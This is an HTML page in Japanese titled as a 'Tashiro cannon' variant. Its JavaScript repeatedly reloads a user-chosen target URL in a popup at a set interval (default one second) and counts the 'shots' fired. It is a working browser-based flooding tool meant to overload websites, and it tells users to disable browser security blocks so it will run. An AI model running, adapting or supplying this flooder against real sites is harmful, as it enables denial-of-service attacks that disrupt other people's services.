<!DOCTYPE html>
<html lang="ja">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
        <title>超田代砲改 Ver.1.3 改　プチ改造大東亜共栄砲 </title>
        <style>
        body {
            scrollbar-3d-light-color :#000000;
            scrollbar-arrow-color :#000000;
            scrollbar-base-color :#000000;
            scrollbar-dark-shadow-color :#000000;
            scrollbar-face-color : #000000;
            scrollbar-highlight-color : #ffffff;
            scrollbar-shadow-color : #000000;
        }
        
        H1 {
            COLOR : #ff0000;
            text-indext : 10%;
        }
        
        H2 {
            COLOR : #ff0000;
            text-indext : 10%;
        }
        
        H3 {
            COLOR : #ff0000;
            text-indext : 10%;
        }
        
        H4 {
            COLOR : #ff0000;
            text-indext : 10%;
        }
        
        H5 {
            COLOR : #ff0000;
            text-indext : 10%;
        }
        
        H6 {
            COLOR : #ff0000;
            text-indext : 10%;
        }
        
        A { TEXT-DECORATION : none }
        A:link { COLOR : #0000CC }
        A:visited { COLOR :#0000CC }
        A:active { COLOR #0000CC:}
        A:hover {
            COLOR: #e42063; 
            TEXT-DECORATION: underline
            COLOR : #ff0000;
        }
        
        TD.LEFT {
            TEXT-ALIGN : right;
            WIDTH : 200px;
        }
        
        TD.RIGHT {
            WIDTH : 200px;
            align : left;
        }
        </style>
        <script>
        function closewin(){
            self.close();
        }
        </script>
        <script>
        resizeTo(600,600);
        </script>
        <body text="#000000" bgcolor="#FFFFFF">
        <div align="center">
            <script>
            var wind = "";
            var add = "";
            function display(){
                add = document.f.address.value;
                wind = window.open(add, 'san', 'width=300, height=300');
                tashiro();
            }
            
            function tashiro(){
                wind.location = add;
                document.f.fired.value++;
                setTimeout("tashiro();", f.inter.value * 1000);
            }
            </script>
            <font color="#000000" size="5"><b><u>超田代砲改 Ver.1.3 プチ改造大東亜共栄砲</u></b></font> <BR><BR>
            <form name="f">
                <font color="#000000">目標アドレス:</font><br>
                <input size="100" value="ここに目標URLを入れる" name="address"><br><br>
                <font color="#000000">砲撃間隔:</font><br>
                <input size="5" value="1" name="inter">秒<BR><br>
                <font color="#000000">既砲撃回数:</font><br>
                <input value="0" name="fired"><br><input onclick="display()" type="button" value="砲撃開始">
            </form>
            <form>
                <input onclick="closewin()" type=button value="砲撃終了">
            </form><br><br>
            <font size="2" color="pink"><u><font color="#FF0000">※注意：WidowsXPSP2ではｾｷｭﾘﾃｨｰ保護の制限を解除してください。<br>
            ブロックされているコンテンツの許可をクリックしてください</font></u>
            </font>
            <font color="#FF0000"></font>
        </div>
    </body>
</html>
